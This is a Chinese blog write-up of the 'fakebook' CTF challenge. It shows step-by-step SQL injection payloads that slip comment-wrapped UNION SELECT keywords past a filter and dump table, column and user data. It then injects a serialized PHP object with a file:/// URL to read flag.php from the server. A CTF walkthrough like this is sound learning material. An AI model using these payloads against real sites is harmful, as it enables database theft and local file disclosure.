fakebook

打开链接，发现三个页面

查看源代码，没有发现什么

注册一个账号登录进去

查看源代码

点击admin进入，发现一个参数no

测试注入，加上'后报错

整数型注入

意思是，在/var/www/html/view.php查看属性或调用函数

1 order by 5#时报错，列数为4

判断显示位

可能被过滤了，尝试绕过uinon select

查看当前数据库

查表

?no=-1 /*--*/union/*--*/select/*--*/ 1,group_concat(table_name),3,4%20 from information_schema.tables where table_schema='fakebook'--+

查列名

?no=-1 /*--*/union/*--*/select/*--*/ 1,column_name,3,4%20 from information_schema.columns where table_name='users' --+

查字段信息

?no=-1 /*--*/union/*--*/select/*--*/ 1,group_concat(data),3,4%20 from fakebook.users --+

尝试no=1注入处进行反序列化读取本地文件

?no=0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:10:"admin11111";s:3:"age";i:11;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

查看源代码，发现flag

flag = "flag{c1e552fdf77049fabf65168f22f7aeab}

posted @ 2021-09-13 14:46 凇岳阅读(312) 评论(0) 收藏举报

刷新页面返回顶部

凇岳